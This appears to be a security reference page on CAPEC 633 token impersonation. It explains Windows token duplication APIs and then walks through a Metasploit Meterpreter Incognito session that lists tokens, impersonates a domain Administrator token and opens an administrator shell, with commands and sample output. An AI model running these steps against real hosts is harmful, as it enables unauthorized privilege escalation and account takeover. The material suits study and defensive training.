633 - Token Impersonation
An adversary exploits a weakness in authentication to create an access token (or equivalent) that impersonates a different entity, and then associates a process/thread to that that impersonated token. This action causes a downstream user to make a decision or take action that is based on the assumed identity, and not the response that blocks the adversary.
Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex)
. The token can then be used with ImpersonateLoggedOnUser
to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken
to assign the impersonated token to a thread.
An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.
There are two types of Tokens of interest:
Delegate: Interactive access to hosts
Impersonate: Non-interactive access to hosts
Steps to Interface with Tokens
Metasploits Meterpreter has a built-in extension named Incognito that allows an attacker to interface with tokens on a compromised host. Once you have a Meterpreter session, you can impersonate valid tokens on the system and become that specific user without ever having to worry about credentials, or for that matter, even hashes.
(meterpreter) > load incognito
(meterpreter) > help
Incognito Commands
==================
Command Description
------- -----------
add_group_user Attempt to add a user to a global group with all tokens
add_localgroup_user Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token
Identifying Tokens: The below example shows to the command to run to list all delegation and impersonation tokens on the target host. Of note is the Administrator delegation token.
(meterpreter) > list_tokens -u Delegation Tokens Available ======================================== Font Driver Host\UMFD-0 Font Driver Host\UMFD-1 NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM darkcybe\Administrator Window Manager\DWM-1 Impersonation Tokens Available ======================================== No tokens available
Token Impersonation: When issuing the below command to perform the token impersonation using the previously identified Administrator delegate token, proceeding commands will be executed under that account.
(meterpreter) > impersonate_token darkcybe\\Administrator [+] Delegation token available [+] Successfully impersonated user darkcybe\Administrator
Command Execution: With the Administrator account now being impersonated using the delegation token, commands can be run using the meterpreter shell. Running
execute -f cmd.exe -i -t
from within Meterpreter executes cmd.exe, the-i
allows us to interact with the victims PC, and the-t
assumes the role we just impersonated through incognito.(meterpreter) > shell Process 1676 created. Channel 1 created. Microsoft Windows [Version 10.0.22623.870] (C) Microsoft Corporation. All rights reserved. C:\WINDOWS\system32> whoami whoami darkcybe\administrator
Sources
Last updated